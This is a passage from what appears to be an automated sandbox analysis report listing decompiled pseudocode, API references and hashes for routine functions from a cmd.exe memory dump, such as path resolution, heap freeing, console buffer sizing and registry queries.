Opcode Fuzzy Hash: e75517bd3ef456bb30e3c632652ff9bf05fdf88052db71b2b684558f006c84ab
Instruction Fuzzy Hash: 8251BF71900204DFDF189FA9E89527DBBA5EF80300F2881AAE902D7391EB31D951DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D92D22, Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00D92D22(intOrPtr* __ecx, long __edx, WCHAR* _a4) {
				long _v8;
				WCHAR* _v12;
				void* __ebx;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t35;
				short _t38;
				signed short _t40;
				int _t41;
				long _t46;
				intOrPtr _t49;
				short _t50;
				int _t53;
				intOrPtr* _t60;
				signed int _t62;
				signed short* _t63;
				intOrPtr* _t68;
				signed int _t70;
				void* _t72;
				void* _t75;
				signed short* _t76;
				void* _t78;
				WCHAR* _t80;
				long _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed short* _t87;

				_push(__ecx);
				_push(__ecx);
				_t80 = __ecx;
				_v8 = __edx;
				_t57 = _a4;
				_t53 = 0;
				_t84 = _a4;
				_t3 = _t84 + 2; // 0x2
				_t72 = _t3;
				do {
					_t30 =  *_t84;
					_t84 = _t84 + 2;
				} while (_t30 != 0);
				_t86 = _t84 - _t72 >> 1;
				_t31 = E00D922C0(0, _t57);
				_t4 = _t86 + 1; // -1
				_t87 = _a4;
				E00D91040(_t87, _t4, _t31);
				if(( *_t87 & 0x0000ffff) == 0) {
					E00D936CB(0, __ecx, _v8, 0);
					_t60 = __ecx + 4;
					_t75 = _t60 + 2;
					do {
						_t35 =  *_t60;
						_t60 = _t60 + 2;
					} while (_t35 != 0);
					_t62 = _t60 - _t75 >> 1;
					if(_t62 + 3 < 0x7fe7) {
						if(_t62 != 1) {
							_t38 = 0x5c;
							 *((short*)(__ecx + 4 + _t62 * 2)) = _t38;
							 *((short*)(__ecx + 6 + _t62 * 2)) = 0;
						}
						goto L8;
					}
					 *0xdc3cf0 = 3;
					goto L21;
				} else {
					_t63 = _t87;
					_t6 =  &(_t63[1]); // 0x2
					_t76 = _t6;
					do {
						_t40 =  *_t63;
						_t63 =  &(_t63[1]);
					} while (_t40 != 0);
					if(_t63 - _t76 >> 1 == 2) {
						if(_t87[1] != 0x3a) {
							goto L6;
						}
						E00D936CB(0, __ecx, _v8,  *_t87 & 0x0000ffff);
						_t68 = __ecx;
						_t78 = __ecx + 2;
						do {
							_t49 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t49 != 0);
						_t70 = _t68 - _t78 >> 1;
						if(_t70 > 3) {
							_t50 = 0x5c;
							 *((short*)(__ecx + _t70 * 2)) = _t50;
							 *((short*)(__ecx + 2 + _t70 * 2)) = 0;
						}
						L8:
						return _t53;
					}
					L6:
					_t41 = SetErrorMode(_t53);
					SetErrorMode(1);
					_t82 = _v8;
					_v8 = GetFullPathNameW(_a4, _t82, _t80,  &_v12);
					SetErrorMode(_t41);
					_t46 = _v8;
					if(_t46 == 0 || _t46 > _t82) {
						 *0xdc3cf0 = 0xce;
						L21:
						_t53 = 1;
					}
					goto L8;
				}
			}

0x00d92d27
0x00d92d28
0x00d92d2c
0x00d92d2e
0x00d92d31
0x00d92d34
0x00d92d36
0x00d92d38
0x00d92d38
0x00d92d3b
0x00d92d3b
0x00d92d3e
0x00d92d41
0x00d92d48
0x00d92d4a
0x00d92d4f
0x00d92d52
0x00d92d58
0x00d92d63
0x00d9d8ed
0x00d9d8f2
0x00d9d8f5
0x00d9d8f8
0x00d9d8f8
0x00d9d8fb
0x00d9d8fe
0x00d9d905
0x00d9d90f
0x00d9d920
0x00d9d928
0x00d9d929
0x00d9d930
0x00d9d930
0x00000000
0x00d9d920
0x00d9d911
0x00000000
0x00d92d69
0x00d92d69
0x00d92d6b
0x00d92d6b
0x00d92d6e
0x00d92d6e
0x00d92d71
0x00d92d74
0x00d92d80
0x00d9d93f
0x00000000
0x00000000
0x00d9d94e
0x00d9d953
0x00d9d955
0x00d9d958
0x00d9d958
0x00d9d95b
0x00d9d95e
0x00d9d965
0x00d9d96a
0x00d9d972
0x00d9d973
0x00d9d979
0x00d9d979
0x00d92dc7
0x00d92dcf
0x00d92dcf
0x00d92d86
0x00d92d87
0x00d92d91
0x00d92d9f
0x00d92dab
0x00d92dae
0x00d92db4
0x00d92db9
0x00d9d983
0x00d9d98d
0x00d9d98f
0x00d9d98f
0x00000000
0x00d92db9

APIs

SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92D87
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92D91
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92DA4
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92DAE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ErrorMode$FullNamePath
String ID:
API String ID: 268959451-0
Opcode ID: bed0a192145092d868d297f9df6ddfa009c198bd1ce8455f221f012f0c05ba2b
Instruction ID: 462b516ce48561e6212f51225576d0c20f70d302852c9e3d190f99a2e3ebb9c3
Opcode Fuzzy Hash: bed0a192145092d868d297f9df6ddfa009c198bd1ce8455f221f012f0c05ba2b
Instruction Fuzzy Hash: CB410839100202BBCF28FF68C8559BEB3AAEF88704758865DE946D7650E771AE45C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8EEF0, Relevance: 6.1, APIs: 4, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D8EEF0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				void* __ebx;
				intOrPtr _t8;
				signed int _t9;
				intOrPtr _t12;
				void* _t18;
				intOrPtr _t23;
				signed int _t25;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t36;

				_t8 =  *0xdc3cd8;
				_t34 = _a4;
				_t23 = __edx;
				_t33 = __ecx;
				 *0xdbf980 = __ecx;
				if(_t8 <= _t34) {
					L4:
					_t35 = 0;
					_t9 = 0;
					_t25 = 0;
					do {
						if(_t9 >= 0 && _t25 < 2) {
							_t18 =  *(0xdad5b8 + _t35 * 4);
							if(_t18 != 0) {
								VirtualFree(_t18, 0, 0x8000);
								 *(0xdad5b8 + _t35 * 4) = 0;
							}
						}
						_t35 = _t35 + 1;
						_t9 = _t35;
						_t25 = _t9;
					} while (_t35 < 2);
					 *0xdbb8ac = _t33;
					_push(0);
					_push(0xdbb940);
					 *0xdbb8a8 = _t23;
					 *0xdb3892 = 0;
					 *0xdbb8a4 = 0xdb3892;
					 *0xdbb8a0 = 0xdb3892;
					L00D982C1();
					if(0 != 0) {
						return 0;
					}
					 *0xdad558 = 0;
					 *0xdad554 = 0;
					_t36 = E00D8DC74(_t23, 0);
					if(_t36 == 0) {
						_t12 = 1;
					} else {
						if(E00D8EEC8() != 0 && E00D8F030(0) != 0xa &&  *0xdbfa90 != 0) {
							E00DA82EB(0);
						}
						_t12 = 0;
					}
					 *0xdad5c8 = _t12;
					if( *0xdbfa88 != 0) {
						E00DA8121(_t36, 0);
					}
					return _t36;
				}
				while(1) {
					_t32 =  *0xdc3cdc;
					if(_t32 == 0) {
						goto L4;
					}
					 *_t32 = 0;
					 *0xdc3cdc =  *(_t32 + 4);
					 *0xdc3cd8 = _t8 - 1;
					 *(_t32 + 4) = 0;
					RtlFreeHeap(GetProcessHeap(), 0, _t32);
					_t8 =  *0xdc3cd8;
					if(_t8 > _t34) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00d8eef5
0x00d8eefc
0x00d8eeff
0x00d8ef02
0x00d8ef04
0x00d8ef0c
0x00d8ef4f
0x00d8ef4f
0x00d8ef51
0x00d8ef53
0x00d8ef55
0x00d8ef57
0x00d8ef5e
0x00d8ef67
0x00d8f00d
0x00d8f013
0x00d8f013
0x00d8ef67
0x00d8ef6d
0x00d8ef6e
0x00d8ef70
0x00d8ef72
0x00d8ef79
0x00d8ef7f
0x00d8ef80
0x00d8ef85
0x00d8ef8b
0x00d8ef91
0x00d8ef9b
0x00d8efa5
0x00d8efaf
0x00d8effb
0x00d8effb
0x00d8efb3
0x00d8efb8
0x00d8efc2
0x00d8efc6
0x00d8effe
0x00d8efc8
0x00d8efcf
0x00d9c117
0x00d9c117
0x00d8efe1
0x00d8efe1
0x00d8efea
0x00d8efef
0x00d9c125
0x00d9c125
0x00000000
0x00d8eff5
0x00d8ef10
0x00d8ef10
0x00d8ef18
0x00000000
0x00000000
0x00d8ef1f
0x00d8ef27
0x00d8ef2d
0x00d8ef32
0x00d8ef40
0x00d8ef46
0x00d8ef4d
0x00000000
0x00000000
0x00000000
0x00d8ef4d
0x00000000

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,00D8E5F6,?,00000000,00000000,00000000), ref: 00D8EF39
RtlFreeHeap.NTDLL(00000000,?,00D8E5F6), ref: 00D8EF40
_setjmp3.MSVCRT ref: 00D8EFA5
VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,00D8E5F6,?,00000000,00000000,00000000), ref: 00D8F00D

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: FreeHeap$ProcessVirtual_setjmp3
String ID:
API String ID: 2613391085-0
Opcode ID: f33b7676e5e26925e148bc3052b4faf084f69baf97389a520f277e5de97e054b
Instruction ID: f373bd52d52b2ef78e43af51ed20379afebeb5f96129f13e6b1b15f36de37350
Opcode Fuzzy Hash: f33b7676e5e26925e148bc3052b4faf084f69baf97389a520f277e5de97e054b
Instruction Fuzzy Hash: CC317F71A04312DFDB54BF69AC49B2ABBE9EB45714F18812AF506DB360DB70D8408F74

Uniqueness

Uniqueness Score: -1.00%

Function 00DA579A, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00DA579A(void* __ecx, void* __eflags) {
				char* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				signed int _t13;
				short _t21;
				char* _t25;
				int _t29;
				short* _t32;
				void* _t35;
				short* _t37;
				short* _t41;
				int _t46;

				_push(__ecx);
				_t7 = E00D97797(__ecx);
				if(_t7 != 0) {
					_t7 =  *0xdcc018(0, 0);
					if(0 != 0) {
						_t28 = 0;
						_t41 = E00D900B0(0);
						if(_t41 == 0) {
							L3:
							E00DA9287(_t28);
							__imp__longjmp(0xdbb8b8, 1);
						}
						_t28 = 0;
						_t25 = E00D900B0(0);
						_v8 = _t25;
						if(_t25 == 0) {
							goto L3;
						}
						if(E00D97797(0) != 0) {
							 *0xdcc018(0, _t25);
						}
						_t29 =  *0xdb3854;
						_t13 = E00D90638(_t29);
						asm("sbb eax, eax");
						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
						_t46 = SetErrorMode(1);
						if( *_t41 != 0) {
							_t35 = 0;
							do {
								E00D933FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
								_t32 = _t41;
								_t3 =  &(_t32[1]); // 0x2
								_t37 = _t3;
								do {
									_t21 =  *_t32;
									_t32 =  &(_t32[1]);
								} while (_t21 != 0);
								_t35 = 1;
								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
							} while ( *_t41 != 0);
							_t25 = _v8;
						}
						SetErrorMode(_t46);
						_t7 = E00D90040(_t25);
					}
				}
				return _t7;
			}

0x00da579f
0x00da57a3
0x00da57aa
0x00da57b4
0x00da57be
0x00da57c4
0x00da57cc
0x00da57d0
0x00da57d2
0x00da57d2
0x00da57de
0x00da57de
0x00da57e4
0x00da57eb
0x00da57ed
0x00da57f2
0x00000000
0x00000000
0x00da57fb
0x00da57ff
0x00da57ff
0x00da5805
0x00da580b
0x00da5816
0x00da581d
0x00da582b
0x00da5832
0x00da5834
0x00da5838
0x00da583c
0x00da5841
0x00da5843
0x00da5843
0x00da5846
0x00da5846
0x00da5849
0x00da584c
0x00da5857
0x00da585b
0x00da585e
0x00da5863
0x00da5863
0x00da5867
0x00da586f
0x00da586f
0x00da57be
0x00da587a

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

longjmp.MSVCRT(00DBB8B8,00000001,?,?,00D93A4E,?,?,?,?,?,?,?,?), ref: 00DA57DE
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00D93A4E), ref: 00DA581D
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00D93A4E), ref: 00DA5825
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00D93A4E), ref: 00DA5867

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
String ID:
API String ID: 162963024-0
Opcode ID: 880d21c38d08cc2eb5d973caf29abb07880d97c5c38638c83a39abd23d7bbf3d
Instruction ID: eb7a8bd1deac70ddfe180793572d533b6e811e81904c1b7a1d92ece168c503de
Opcode Fuzzy Hash: 880d21c38d08cc2eb5d973caf29abb07880d97c5c38638c83a39abd23d7bbf3d
Instruction Fuzzy Hash: 08212636600703ABDB20ABB5AC599BE775ADFC53107080228FD06D7395EE358D0582B0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA29B9, Relevance: 6.1, APIs: 4, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DA29B9(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				intOrPtr* _t54;
				void* _t60;
				long _t69;
				void* _t71;

				_t54 = _a4;
				_t71 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t54 + 4));
				_t39 = __ecx + 0xc;
				 *_t39 = 0;
				_v12 = _t39;
				 *((short*)(__ecx + 0x10)) =  *((intOrPtr*)(_t54 + 0x20));
				 *((intOrPtr*)(__ecx + 0x14)) =  *_t54;
				_t42 = __ecx + 0x1c;
				 *_t42 = 0;
				_v16 = _t42;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t54 + 0x48));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t54 + 0x4c));
				_t45 = __ecx + 0x28;
				 *_t45 = 0;
				_v20 = _t45;
				_t46 = E00DA28F1( *((intOrPtr*)(_t54 + 0xc)));
				_t47 = E00DA28D9( *((intOrPtr*)(_t54 + 0x1c)));
				_t48 = E00DA28D9( *((intOrPtr*)(_t54 + 0x44)));
				_t69 = _t46 + _t47 + _t48;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0 ||  *((intOrPtr*)(__ecx + 0x30)) < _t69) {
					_t48 = HeapAlloc(GetProcessHeap(), 8, _t69);
					_v8 = _t48;
					if(_t48 != 0) {
						RtlFreeHeap(GetProcessHeap(), 0,  *(_t71 + 0x2c));
						_t48 = _v8;
						 *(_t71 + 0x2c) = _t48;
						 *(_t71 + 0x30) = _t69;
					}
				}
				_t60 =  *(_t71 + 0x2c);
				if(_t60 != 0) {
					_t73 = _t60 +  *(_t71 + 0x30);
					_t48 = E00DA162E(E00DA15C1(E00DA15C1(_t60, _t60 +  *(_t71 + 0x30),  *((intOrPtr*)(_t54 + 0x1c)), _v12), _t73,  *((intOrPtr*)(_t54 + 0x44)), _v16), _t73,  *((intOrPtr*)(_t54 + 0xc)), _v20);
				}
				return _t48;
			}

0x00da29c5
0x00da29c9
0x00da29ce
0x00da29d4
0x00da29d7
0x00da29da
0x00da29dc
0x00da29e3
0x00da29e9
0x00da29ec
0x00da29ef
0x00da29f1
0x00da29f7
0x00da29fd
0x00da2a00
0x00da2a03
0x00da2a08
0x00da2a0b
0x00da2a15
0x00da2a1f
0x00da2a24
0x00da2a2a
0x00da2a3b
0x00da2a41
0x00da2a46
0x00da2a54
0x00da2a5a
0x00da2a5d
0x00da2a60
0x00da2a60
0x00da2a46
0x00da2a63
0x00da2a68
0x00da2a70
0x00da2a95
0x00da2a95
0x00da2aa0

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,00DA1C4B), ref: 00DA2A34
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00DA1C4B), ref: 00DA2A3B
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00DA1C4B), ref: 00DA2A4D
RtlFreeHeap.NTDLL(00000000), ref: 00DA2A54

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3cd6790773943e6583e070b1fcfb47b459d2d1eed97f5650ef714de76e4ce180
Instruction ID: 086bbe76c85948a3acc659133a92292698c12b11df5ffe393deac31938b9b40b
Opcode Fuzzy Hash: 3cd6790773943e6583e070b1fcfb47b459d2d1eed97f5650ef714de76e4ce180
Instruction Fuzzy Hash: 41310579A007059FCB25DF69D88996ABBF5FF49310B0485AAED4AC7711EB30E901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D94E94, Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00D94E94(void*** __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t16;
				signed int _t17;
				void* _t21;
				void* _t22;
				void*** _t27;
				void* _t37;
				void* _t38;
				void** _t39;
				signed int _t40;

				_t37 = __edx;
				_t13 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t13 ^ _t40;
				_t27 = __ecx;
				_t29 = 0x2c;
				_t39 = E00D900B0(_t29);
				if(_t39 == 0) {
					L6:
					_t16 = E00DA9287(_t29);
					__imp__longjmp(0xdbb8b8, 1);
					L7:
					__imp___get_osfhandle(1);
					 *_t39 = _t16;
					_t17 = GetConsoleScreenBufferInfo(_t16,  &_v32);
					if(_t17 == 0) {
						 *_t39 =  *_t39 & _t17;
					}
					L2:
					if(GetConsoleScreenBufferInfo( *_t39,  &_v32) != 0) {
						_t38 = 0x2000;
						_t21 = _v32.dwSize + 2;
						if(_t21 >= 0x2000) {
							_t38 = _t21;
						}
					} else {
						_t38 = 0x2002;
					}
					_t29 = _t38 + _t38;
					_t22 = E00D900B0(_t38 + _t38);
					if(_t22 != 0) {
						_t39[4] = _t22;
						_t39[3] = _t38;
						_t39[5] = 0;
						_t39[2] = 0;
						_t39[1] = 0;
						_t39[9] = 0;
						E00D94F29(_t39);
						 *_t27 = _t39;
						return E00D96FD0(0, _t27, _v8 ^ _t40, _t37, _t38, _t39);
					}
					goto L6;
				}
				 *_t39 =  *_t39 & 0x00000000;
				_t16 = E00D90178(_t15);
				if(_t16 != 0) {
					goto L7;
				}
				goto L2;
			}

0x00d94e94
0x00d94e9c
0x00d94ea3
0x00d94eab
0x00d94ead
0x00d94eb3
0x00d94eb7
0x00d9f00a
0x00d9f00a
0x00d9f016
0x00d9f01c
0x00d9f01e
0x00d9f028
0x00d9f02c
0x00d9f034
0x00d9f03a
0x00d9f03a
0x00d94ed0
0x00d94ede
0x00d9f045
0x00d9f04a
0x00d9f04f
0x00d9f055
0x00d9f055
0x00d94ee4
0x00d94ee4
0x00d94ee4
0x00d94ee9
0x00d94eec
0x00d94ef3
0x00d94ef9
0x00d94f00
0x00d94f03
0x00d94f06
0x00d94f09
0x00d94f0c
0x00d94f0f
0x00d94f1a
0x00d94f28
0x00d94f28
0x00000000
0x00d94ef3
0x00d94ebd
0x00d94ec3
0x00d94eca
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D92F2C,-00000001,-00000001,-00000001,-00000001), ref: 00D94ED6
longjmp.MSVCRT(00DBB8B8,00000001,?,00000104,00000000,?,?,00D92F2C,-00000001,-00000001,-00000001,-00000001), ref: 00D9F016
_get_osfhandle.MSVCRT ref: 00D9F01E
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D92F2C,-00000001,-00000001,-00000001,-00000001), ref: 00D9F02C

Part of subcall function 00D90178: _get_osfhandle.MSVCRT ref: 00D90183
Part of subcall function 00D90178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9D6A1), ref: 00D9018D

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
String ID:
API String ID: 1629431960-0
Opcode ID: f2f40055afa29e412d3075c06f72aa812f846e4c40ce305dbb0032a3b4923e8c
Instruction ID: fd85342c1bb35b14c89714318f7e7c29ca093e19c1e5dd049ed6814745d60cc7
Opcode Fuzzy Hash: f2f40055afa29e412d3075c06f72aa812f846e4c40ce305dbb0032a3b4923e8c
Instruction Fuzzy Hash: 9F218E71A003069FEB209F75E849B6BB7E8EF54711F14492EE84AC6242FB75D801CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DA997C, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00DA997C(WCHAR* __ecx, void* __edi) {
				signed int _v8;
				long _v20;
				char _v24;
				signed int _v28;
				void _v548;
				WCHAR* _v552;
				void* __ebx;
				void* __esi;
				signed int _t24;
				WCHAR* _t37;
				long _t38;
				void* _t39;
				WCHAR* _t40;
				char _t43;
				void* _t51;
				void* _t52;
				WCHAR* _t53;
				signed int _t54;

				_t52 = __edi;
				_t24 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t24 ^ _t54;
				_v552 = _v552 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = 0x104;
				_t43 = 1;
				_t53 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					_t43 = 0;
				} else {
					_t37 = _v28;
					if(_t37 == 0) {
						_t37 =  &_v548;
					}
					_t38 = GetFullPathNameW(_t53, _v20, _t37,  &_v552);
					if(_t38 == 0 || _t38 <= 0xffce) {
						goto L10;
					} else {
						_t39 = _v28;
						if(_t39 == 0) {
							_t39 =  &_v548;
						}
						 *((short*)(_t39 + 6)) = 0;
						_t40 = _v28;
						if(_t40 == 0) {
							_t40 =  &_v548;
						}
						if(GetDriveTypeW(_t40) != 4) {
							goto L10;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t43, _t43, _v8 ^ _t54, _t51, _t52, _t53, _v28);
			}

0x00da997c
0x00da9987
0x00da998e
0x00da9991
0x00da999d
0x00da99a4
0x00da99af
0x00da99b3
0x00da99b5
0x00da99b8
0x00da99e1
0x00da9a39
0x00da9a39
0x00da99e3
0x00da99e3
0x00da99e8
0x00da99ea
0x00da99ea
0x00da99fc
0x00da9a04
0x00000000
0x00da9a0d
0x00da9a0d
0x00da9a12
0x00da9a14
0x00da9a14
0x00da9a1c
0x00da9a20
0x00da9a25
0x00da9a27
0x00da9a27
0x00da9a37
0x00000000
0x00000000
0x00da9a37
0x00da9a04
0x00da9a3e
0x00da9a56

APIs

memset.MSVCRT ref: 00DA99B8

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,00D82178,00310030), ref: 00DA99FC
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00D82178,00310030), ref: 00DA9A2E
??_V@YAXPAX@Z.MSVCRT ref: 00DA9A3E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$DriveFullNamePathType
String ID:
API String ID: 3442494845-0
Opcode ID: a29f1b8e812fc60ef1261ea950155dc08619d467c095733ab2c2aa90f2f64967
Instruction ID: 66a28e941e5fb61f32a92fbcff161b2894bc07519204618d1d5f0f4ddca1d2cc
Opcode Fuzzy Hash: a29f1b8e812fc60ef1261ea950155dc08619d467c095733ab2c2aa90f2f64967
Instruction Fuzzy Hash: 3E214171A0121AABDB10DFE4EC99BBFB7B8EF05304F1401AAE505E3141E634DE448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DA5662, Relevance: 6.1, APIs: 4, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00DA5662(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t34;
				void* _t44;

				_push(0x1c);
				_push(0xdac100);
				E00D97678(__ebx, __edi, __esi);
				_t41 = __ecx;
				 *((intOrPtr*)(_t44 - 0x2c)) = __ecx;
				_t43 = 0;
				 *(_t44 - 0x20) = 0;
				 *(_t44 - 0x24) = 0;
				 *(_t44 - 0x1c) = __ecx;
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(__edx == 0 ||  *__edx == 0) {
					L4:
					_t21 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, 0, _t44 - 0x24);
					if(_t21 != 2) {
						if(_t21 != 0) {
							goto L3;
						} else {
							_t43 = E00D900B0( *(_t44 - 0x24));
							 *(_t44 - 0x20) = _t43;
							if(_t43 == 0) {
								_push(8);
								goto L11;
							} else {
								_t34 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, _t43, _t44 - 0x24);
								if(_t34 != 0) {
									E00D90040(_t43);
									_t43 = 0;
									 *(_t44 - 0x20) = 0;
									_push(_t34);
									goto L11;
								}
							}
						}
					} else {
						_t43 = E00D8DF40(0xd824ac);
